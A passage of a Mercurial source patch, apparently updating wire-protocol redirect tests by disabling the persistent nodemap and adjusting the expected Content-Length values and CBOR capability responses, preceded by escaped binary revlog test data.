\x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (no-zstd !) + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00Q\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd WE\x02\x00r\x04\x0f\x14\x90\x01\x0e#\xf7h$;NQC%\xf8f\xd7\xb1\x81\x8d+\x01\x16+)5\xa8\x19\xdaA\xae\xe3\x00\xe9v\xe2l\x05v\x19\x11\xd4\xc1onK\xa2\x17c\xb4\xf3\xe7 z\x13\x8f\x1c\xf3j4\x03\x03\x00`\x06\x84\x8b\x1a\n\x14\x00\x00\x00\x00\x00\xcf\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (zstd !) b'' ] diff --git a/tests/test-wireproto-content-redirects.t b/tests/test-wireproto-content-redirects.t --- a/tests/test-wireproto-content-redirects.t +++ b/tests/test-wireproto-content-redirects.t @@ -1,6 +1,10 @@ $ . $TESTDIR/wireprotohelpers.sh +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no > [extensions] > blackbox = > [blackbox] @@ -66,9 +70,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2308\r\n + s> Content-Length: 2289\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa5DnameHtarget-aHprotocolDhttpKsnirequired\xf4Ktlsversions\x82C1.2C1.3Duris\x81Shttp://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa5DnameHtarget-aHprotocolDhttpKsnirequired\xf4Ktlsversions\x82C1.2C1.3Duris\x81Shttp://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (remote redirect target target-a is compatible) (tls1.2 !) (remote redirect target target-a requires unsupported TLS versions: 1.2, 1.3) (no-tls1.2 !) sending capabilities command @@ -396,9 +400,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2335\r\n + s> Content-Length: 2316\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x82\xa3DnameHtarget-aHprotocolDhttpDuris\x81Shttp://example.com/\xa3DnameHtarget-bHprotocolGunknownDuris\x81Vunknown://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x82\xa3DnameHtarget-aHprotocolDhttpDuris\x81Shttp://example.com/\xa3DnameHtarget-bHprotocolGunknownDuris\x81Vunknown://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (remote redirect target target-a is compatible) (remote redirect target target-b uses unsupported protocol: unknown) sending capabilities command @@ -731,9 +735,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2295\r\n + s> Content-Length: 2276\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKsnirequired\xf5Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKsnirequired\xf5Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (redirect target target-bad-tls requires SNI, which is unsupported) sending capabilities command s> setsockopt(6, 1, 1) -> None (?) @@ -1055,9 +1059,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2301\r\n + s> Content-Length: 2282\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKtlsversions\x82B42B39Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\